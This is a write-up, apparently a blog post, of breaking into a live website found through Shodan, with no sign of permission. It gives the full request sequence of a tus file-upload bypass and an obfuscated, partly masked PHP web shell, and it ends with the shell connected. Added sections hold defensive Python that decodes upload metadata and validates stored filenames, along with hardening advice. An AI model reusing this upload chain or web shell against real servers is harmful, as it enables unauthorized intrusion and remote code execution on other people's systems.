A File Upload That Went Through OPTIONS and PATCH

Notes on a somewhat strange file upload that ended with SYSTEM privileges

Information Gathering

Shodan was on sale, so I bought a membership for 4 dollars to see whether there were any fun sites out there, and that is how I found this target.

The machine had a lot of open ports: 21, 80, 443, 1935, 8080, 8083, 8086, 8087 and 8089, each with a service listening. A quick round of testing immediately turned up SQL injection and directory traversal problems.

SQL Injection

This site was absurd enough that even a spot like https://**/index.php?i=aviso-legal was injectable, but a sqlmap run found nothing useful; there was not even a user table.

File Upload

So I went looking for a new way in. I registered a user and looked at the captured requests from the avatar upload, which showed the following sequence of operations.

POST (tus creation request: Upload-Length announces the size and Upload-Metadata carries base64 key/value pairs, here name/filename bWEucGhw, which decodes to ma.php; the 201 response returns the upload's Location)

POST /files/ HTTP/1.1
Host: server-***.***-**********.com:8085
Connection: close
Content-Length: 0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Tus-Resumable: 1.0.0
Upload-Length: 874
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Upload-Metadata: relativePath bnVsbA==,name bWEucGhw,type cGhw,filetype cGhw,filename bWEucGhw    
Accept: */*
Origin: https://**.*.***.*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

HTTP/1.0 201 Created
Date: Wed, 31 Mar 2021 08:52:54 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
X-Content-Type-Options: nosniff
Tus-Resumable: 1.0.0
Access-Control-Allow-Origin: https://**.*.***.*
Access-Control-Allow-Methods: GET,POST,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Content-Length, Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Tus-Version, Tus-Resumable, Upload-Metadata
Access-Control-Expose-Headers: Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Upload-Metadata, Tus-Version, Tus-Resumable, Tus-Extension, Location
Access-Control-Max-Age: 86400
Location: https://server-***.***-**********.com:8085/files/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832
Upload-Expires: Thu, 01 Apr 2021 10:52:54 GMT
Cache-Control: no-cache, private
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
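Everything in the Upload-Metadata header above is base64, so the name that matters (ma.php) is invisible to any filter that looks at the raw header text. The following is an added example, not code from the original post or from the target's tus server: it decodes and re-encodes the header as tus 1.0 defines it (comma-separated "key base64value" pairs, a key may stand alone), and adds the server-side check that was missing here: an extension allowlist on the decoded name plus a server-generated storage name. The allowlist and the random-name policy are assumptions about a sane avatar upload, not anything the target does.

```python
import base64
import binascii
import posixpath
import secrets
from typing import Dict, Optional

# Upload-Metadata header copied from the tus creation request on this page.
CAPTURED_UPLOAD_METADATA = (
    "relativePath bnVsbA==,name bWEucGhw,type cGhw,filetype cGhw,filename bWEucGhw"
)

# Hypothetical avatar policy for the hardened check (assumption, not taken from the target).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}


def decode_upload_metadata(header: str) -> Dict[str, str]:
    """Parse a tus 1.0 Upload-Metadata header into a dict.

    The header is a comma-separated list of "key base64value" pairs; a key may
    stand alone with no value. Decoding is what a server-side filter must do
    before looking at the file name: a string match for ".php" on the raw
    header never fires, because the client sent bWEucGhw, not ma.php.
    """
    meta: Dict[str, str] = {}
    for pair in header.split(","):
        pair = pair.strip()
        if not pair:
            continue
        key, _, b64 = pair.partition(" ")
        if b64:
            try:
                meta[key] = base64.b64decode(b64, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError) as exc:
                raise ValueError(f"malformed Upload-Metadata value for {key!r}") from exc
        else:
            meta[key] = ""
    return meta


def encode_upload_metadata(meta: Dict[str, str]) -> str:
    """Inverse of decode_upload_metadata, e.g. to rebuild a creation request with a chosen name."""
    parts = []
    for key, value in meta.items():
        if value:
            parts.append(f"{key} {base64.b64encode(value.encode('utf-8')).decode('ascii')}")
        else:
            parts.append(key)
    return ",".join(parts)


def filename_is_allowed(name: str) -> bool:
    """Allowlist check on the decoded name: no path separators, one final extension from the allowlist.

    "shell.php.png" passes this test, so the extension check alone is not enough;
    safe_stored_name() below never reuses any part of the client's name.
    """
    if not name or name != posixpath.basename(name.replace("\\", "/")):
        return False
    stem, dot, ext = name.rpartition(".")
    return bool(dot and stem) and ext.lower() in ALLOWED_EXTENSIONS


def safe_stored_name(client_name: str) -> Optional[str]:
    """Server-generated storage name: random token plus the allowlisted extension.

    Returns None when the upload must be rejected, so client-controlled text
    (ma.php, traversal sequences, double extensions) never reaches the filesystem.
    """
    if not filename_is_allowed(client_name):
        return None
    ext = client_name.rpartition(".")[2].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    meta = decode_upload_metadata(CAPTURED_UPLOAD_METADATA)
    print(meta)
    print("ma.php stored as:", safe_stored_name(meta["filename"]))
    print("avatar.png stored as:", safe_stored_name("avatar.png"))
```

Run stand-alone it prints the decoded pairs, rejects ma.php, and shows the random name an innocent avatar.png would get.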

OPTIONS (the browser's CORS preflight for the cross-origin PATCH, which a non-browser client can skip; the reply also advertises the tus extensions the server supports: creation, termination, checksum, expiration, concatenation)

OPTIONS /files/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832 HTTP/1.1
Host: server-***.***-**********.com:8085
Connection: close
Accept: */*
Access-Control-Request-Method: PATCH
Access-Control-Request-Headers: content-type,tus-resumable,upload-offset
Origin: https://**.*.***.*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

HTTP/1.0 200 OK
Date: Wed, 31 Mar 2021 08:53:06 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
X-Content-Type-Options: nosniff
Tus-Resumable: 1.0.0
Access-Control-Allow-Origin: https://**.*.***.*
Access-Control-Allow-Methods: GET,POST,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Content-Length, Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Tus-Version, Tus-Resumable, Upload-Metadata
Access-Control-Expose-Headers: Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Upload-Metadata, Tus-Version, Tus-Resumable, Tus-Extension, Location
Access-Control-Max-Age: 86400
Allow: GET,POST,PATCH,DELETE,HEAD,OPTIONS
Tus-Version: 1.0.0
Tus-Extension: creation,termination,checksum,expiration,concatenation
Tus-Checksum-Algorithm: md2,md4,md5,sha1,sha224,sha256,sha384,sha512/224,sha512/256,sha512,sha3-224,sha3-256,sha3-384,sha3-512,ripemd128,ripemd160,ripemd256,ripemd320,whirlpool,'tiger128,3','tiger160,3','tiger192,3','tiger128,4','tiger160,4','tiger192,4',snefru,snefru256,gost,gost-crypto,adler32,crc32,crc32b,crc32c,fnv132,fnv1a32,fnv164,fnv1a64,joaat,'haval128,3','haval160,3','haval192,3','haval224,3','haval256,3','haval128,4','haval160,4','haval192,4','haval224,4','haval256,4','haval128,5','haval160,5','haval192,5','haval224,5','haval256,5'
Cache-Control: no-cache, private
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

PATCH (the upload itself: the file body goes to the Location from the creation response with Upload-Offset: 0 and Content-Type application/offset+octet-stream; here the body is an obfuscated PHP web shell)

PATCH /files/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832 HTTP/1.1
Host: server-***.***-**********.com:8085
Connection: close
Content-Length: 611
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Tus-Resumable: 1.0.0
Upload-Offset: 0
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/offset+octet-stream
Accept: */*
Origin: https://**.*.***.*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

<?php $GAvo=create_function(base64_decode('****').chr(****-****).chr(0x1406d/0x2e3).base64_decode('bQ==').chr(01173-01026),str_rot13('r').str_rot13('i').chr(0x8c32/0x172).base64_decode('bA==').str_rot13('(').chr(450-414).chr(0426-0243).base64_decode('bw==').chr(0x1e7-0x17a).chr(0x247-0x1e2).chr(0x3bbd/0x175).chr(0x199-0x15e));$GAvo(base64_decode('*****'.'*****'.'*****'.'*****'.''.chr(70635/831).str_rot13('R').str_rot13('9').str_rot13('G').chr(******/0x20b).''.''.chr(444-374).base64_decode('dA==').chr(0xc044/*****).str_rot13('H').base64_decode('bQ==').''.'*****'.'*****'.'*****'.'*****'.'*****'.'='.''));?>

POST (the application's finalize call on the main site; the upload-data JSON is supplied by the client, and the stored path in the response follows its name field: the tus metadata said ma.php, the saved file is shell.php)

POST /*****/****/****.********.php HTTP/1.1
Host: **.*.***.*
Connection: close
Content-Length: 1243
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://**.*.***.*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*/*****/usuario/usuario.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h2ff7e493gj93kdnqtgm3obvbk; _ga=GA1.1.93787588.1617172029; _gid=GA1.1.1489684397.1617172029

accion=upload-update-caller&mysql-tb-update=tb_usuario&mysql-entidad-id=10733&mysql-entidad-valor-anterior=URL_Avatar&upload-data=%7b%22source%22%3a%22Dashboard%22%2c%22id%22%3a%22****-maphppng-image%2fpng-874-1617159102348%22%2c%22name%22%3a%22shell.php%22%2c%22extension%22%3a%22php%22%2c%22meta%22%3a%7b%22relativePath%22%3a%2260643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%2f%22%2c%22name%22%3a%22shell.php%22%2c%22type%22%3a%22php%22%7d%2c%22type%22%3a%22php%22%2c%22data%22%3a%7b%7d%2c%22progress%22%3a%7b%22uploadStarted%22%3a1617173830418%2c%22uploadComplete%22%3atrue%2c%22percentage%22%3a100%2c%22bytesUploaded%22%3a874%2c%22bytesTotal%22%3a874%7d%2c%22size%22%3a874%2c%22isRemote%22%3afalse%2c%22remote%22%3a%22%22%2c%22tus%22%3a%7b%22uploadUrl%22%3a%22https%3a%2f%2fserver-***.***-**********.com%3a8085%2ffiles%2f60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%22%7d%2c%22response%22%3a%7b%22uploadURL%22%3a%22https%3a%2f%2fserver-***.***-**********.com%3a8085%2ffiles%2f60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%22%7d%2c%22uploadURL%22%3a%22https%3a%2f%2fserver-***.***-**********.com%3a8085%2fuploads%2f****%2f60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%2fshell.php%22%2c%22isPaused%22%3afalse%7d

HTTP/1.1 200 OK
Date: Wed, 31 Mar 2021 08:53:41 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 223
Connection: close
Content-Type: application/json

{"estado":"OK","tb_usuario":10733,"objFichero":{"Fichero_ID":10733,"Titulo":"shell.php","RutaWeb":"https:\/\/server-***.***-**********.com:8085\/uploads\/****\/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832\/shell.php"}}
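This last request is where the chain is decided: the application takes name and extension from the client's upload-data JSON and builds the stored path from them, which is why a tus upload declared as ma.php ends up as uploads/.../shell.php. The following is an added example, not the application's code: it parses a finalize body constructed to mirror the captured one, shows the path the vulnerable logic derives from the client's name field, and beside it a hardened version that ignores every client-supplied name and type and instead consults the tus server's own record of the upload (declared size and the first bytes actually received) for an image signature. The upload host, the uploads root, the size limit and the record contents are constructed or assumed for the example.

```python
import json
import posixpath
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode, urlparse

# tus upload key from the Location header captured on this page.
TUS_KEY = "60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832"
# Placeholder host standing in for the masked upload server (assumption).
TUS_UPLOAD_URL = f"https://upload.example:8085/files/{TUS_KEY}"

# Constructed client JSON with the fields of the captured upload-data that matter here.
CLIENT_UPLOAD_DATA = {
    "source": "Dashboard",
    "name": "shell.php",
    "extension": "php",
    "meta": {"relativePath": f"{TUS_KEY}/", "name": "shell.php", "type": "php"},
    "type": "php",
    "size": 874,
    "tus": {"uploadUrl": TUS_UPLOAD_URL},
}
CONSTRUCTED_FINALIZE_BODY = urlencode({
    "accion": "upload-update-caller",
    "mysql-tb-update": "tb_usuario",
    "mysql-entidad-id": "10733",
    "mysql-entidad-valor-anterior": "URL_Avatar",
    "upload-data": json.dumps(CLIENT_UPLOAD_DATA),
})

# What the tus server itself knows about each upload: declared length and the first bytes it
# received. Constructed from the captured PATCH: 874 bytes starting with the PHP open tag.
SERVER_UPLOADS: Dict[str, Dict[str, object]] = {
    TUS_KEY: {"size": 874, "head": b"<?php $GAvo=create_function("},
}

IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_AVATAR_BYTES = 2 * 1024 * 1024  # policy assumption


def parse_finalize_body(body: str) -> dict:
    """Decode the form body and the JSON carried in its upload-data field."""
    form = parse_qs(body, strict_parsing=True)
    return {
        "accion": form["accion"][0],
        "entity_id": int(form["mysql-entidad-id"][0]),
        "upload_data": json.loads(form["upload-data"][0]),
    }


def tus_key_from_url(upload_url: str) -> str:
    """Last path segment of the tus upload URL, i.e. the key the tus server assigned."""
    return posixpath.basename(urlparse(upload_url).path)


def finalize_vulnerable(upload_data: dict, uploads_root: str = "uploads") -> str:
    """Behaviour the captured response shows: the stored path is built from the client's name."""
    key = tus_key_from_url(upload_data["tus"]["uploadUrl"])
    return f"{uploads_root}/{key}/{upload_data['name']}"


def sniff_image_ext(head: bytes) -> Optional[str]:
    """Map the leading bytes of the received file to an image type, or None."""
    for signature, ext in IMAGE_SIGNATURES.items():
        if head.startswith(signature):
            return ext
    return None


def finalize_hardened(upload_data: dict, server_uploads: Dict[str, Dict[str, object]],
                      uploads_root: str = "uploads") -> Optional[str]:
    """Use only server-side facts: the upload must exist under the tus key, its bytes must
    start with an image signature, it must fit the size policy, and the stored name comes
    from the sniffed type, never from a client field. Returns None to reject."""
    tus_info = upload_data.get("tus") or {}
    key = tus_key_from_url(str(tus_info.get("uploadUrl", "")))
    record = server_uploads.get(key)
    if record is None:
        return None
    ext = sniff_image_ext(bytes(record["head"]))
    if ext is None or int(record["size"]) > MAX_AVATAR_BYTES:
        return None
    return f"{uploads_root}/{key}/avatar.{ext}"


if __name__ == "__main__":
    parsed = parse_finalize_body(CONSTRUCTED_FINALIZE_BODY)
    print("vulnerable stores at:", finalize_vulnerable(parsed["upload_data"]))
    print("hardened result:", finalize_hardened(parsed["upload_data"], SERVER_UPLOADS))
```

Even with this check in place, the captured headers show the uploads directory served by the same Apache/PHP instance on port 8085 that runs the tus endpoint, so any file that lands there with a .php name executes. Keeping uploads outside a PHP-enabled document root (or disabling the PHP handler for that directory) is the other half of the fix.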

Shell uploaded successfully and connected.


© 2021. All rights reserved.
